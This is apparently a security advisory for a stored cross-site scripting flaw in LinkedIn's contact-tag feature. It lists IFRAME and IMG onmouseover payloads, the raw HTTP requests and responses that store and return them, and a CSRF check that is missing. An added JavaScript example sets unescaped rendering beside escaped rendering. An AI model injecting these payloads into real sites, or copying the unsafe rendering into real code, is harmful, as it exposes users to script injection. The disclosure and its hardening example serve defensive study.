=========================
First Option
=========================
Go to LinkedIn Contacts -> Connections -> Manage. Then, in the
"Add New Tag" field, enter one of these tags, for example:
+ <IFRAME SRC=# onmouseover="alert('XSS')">
+ <IMG SRC=# onmouseover="alert('XSS')">
+ <IMG onmouseover="alert('XSS')">
Finally, click the "Add New Tag" button, and the page shows the injection.
=========================
Second Option
=========================
Go to LinkedIn Contacts -> Connections -> All Connections and select one contact.
Then, on the right panel, next to the "Tags:" label, click "Edit tags" and enter one of these tags, for example:
+ <IFRAME SRC=# onmouseover="alert('XSS')">
+ <IMG onmouseover="alert('XSS')">
Finally, click the "+" button, and the page shows the injection.
=========================
REQUESTS
=========================
First, create the <IFRAME SRC=# onmouseover="alert('XSS')"> tag:
REQUEST 1:
POST /people/create-tag?csrfToken=TOKEN_CSRF HTTP/1.1
Host: www.linkedin.com
Origin: http://www.linkedin.com
X-Requested-With: XMLHttpRequest
X-IsAJAXForm: 1
Cookie: XXXX

&tagContext=undefined&tagName=%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert('XSS')%22%3E
RESPONSE 1:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Date: Sun, 03 Mar 2013 16:49:14 GMT
X-FS-TXN-ID: 2b654458ea50
X-FS-UUID: e0463ca154f7e712703c4a69cb2a0000
X-LI-UUID: 4EY8oVT35xJwPEppyyoAAA==
Age: 1
X-Content-Type-Options: nosniff
X-XSS-Protection: 0

{"content":"113275897","status":"ok"}
Second, make the request that returns the tag names:
REQUEST 2:
POST /people/fetch-tags?csrfToken=ajax%3A7023500174643473361 HTTP/1.1
Host: www.linkedin.com
Origin: http://www.linkedin.com
X-Requested-With: XMLHttpRequest
User-Agent: MSIE 9.0
X-IsAJAXForm: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://www.linkedin.com/people/connections
Cookie: XXX

&tagContext=conn_detail_panel&memIds=M-220814631
The request also works without the csrfToken, because the server does not verify that the csrfToken value matches the session token in the cookie.
RESPONSE 2:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Date: Sun, 03 Mar 2013 16:50:37 GMT
X-FS-TXN-ID: 2b8fc977b850
X-FS-UUID: a0d6d9c867f7e712d0ff6b10ed2a0000
X-LI-UUID: oNbZyGf35xLQ/2sQ7SoAAA==
Age: 0
X-Content-Type-Options: nosniff
X-XSS-Protection: 0

{"content":"[\"{\\\"id\\\":\\\"104055107\\\",\\\"name\\\":\\\"<IFRAME
SRC=# onmouseover=
\\\\\\\"alert('XSS')\\\\\\\">\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\
\"104044777\\\",\\\"name\\\":\\\"classmates\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id
\\\":\\\"104044787\\\",\\\"name\\\":\\\"colleagues\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",
\"{\\\"id\\\":\\\"104044767\\\",\\\"name\\\":\\\"friends\\\",\\\"bucket\\\":\\\"tagsAllHave\\
\"}\",\"{\\\"id\\\":\\\"104044797\\\",\\\"name\\\":\\\"group
members\\\",\\\"bucket\\\":\\
\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\\"104044807\\\",\\\"name\\\":\\\"partners\\\",\\\"bucket\\
\":\\\"tagsNoneHave\\\"}\"]","status":"ok"}
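=========================
ADDED EXAMPLE
=========================
The fetch-tags response above returns the stored tag name unescaped inside two layers of JSON, so whatever renders it must encode it for HTML. The following is an added example, not LinkedIn's code and not part of the original advisory: it decodes a constructed response of the same shape and renders the names with output encoding. The function names, the sample ids and the string-concatenation rendering in renderUnsafe are assumptions made for illustration.

```javascript
// Constructed sample mirroring the fetch-tags response shape shown above:
// "content" is a JSON string holding an array of JSON strings, one per tag.
const constructedTags = [
  { id: "1", name: "<IFRAME SRC=# onmouseover=\"alert('XSS')\">", bucket: "tagsNoneHave" },
  { id: "2", name: "friends", bucket: "tagsAllHave" },
];
const sampleResponse = JSON.stringify({
  content: JSON.stringify(constructedTags.map((t) => JSON.stringify(t))),
  status: "ok",
});

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Decode both JSON layers and reject anything that is not the expected shape.
function parseTags(body) {
  const outer = JSON.parse(body);
  if (outer.status !== "ok" || typeof outer.content !== "string") {
    throw new Error("unexpected response");
  }
  const list = JSON.parse(outer.content);
  if (!Array.isArray(list)) throw new Error("unexpected content");
  return list.map((item) => {
    const tag = JSON.parse(item);
    if (typeof tag.id !== "string" || typeof tag.name !== "string") {
      throw new Error("bad tag");
    }
    return tag;
  });
}

// Hypothetical vulnerable pattern: the tag name is concatenated into markup as-is.
function renderUnsafe(tags) {
  return tags.map((t) => `<li data-id="${t.id}">${t.name}</li>`).join("");
}

// Hardened: every server-supplied value is escaped before it reaches markup.
function renderSafe(tags) {
  return tags.map((t) => `<li data-id="${escapeHtml(t.id)}">${escapeHtml(t.name)}</li>`).join("");
}
```

In a browser, assigning the name through textContent instead of building markup achieves the same result without a hand-written escaper.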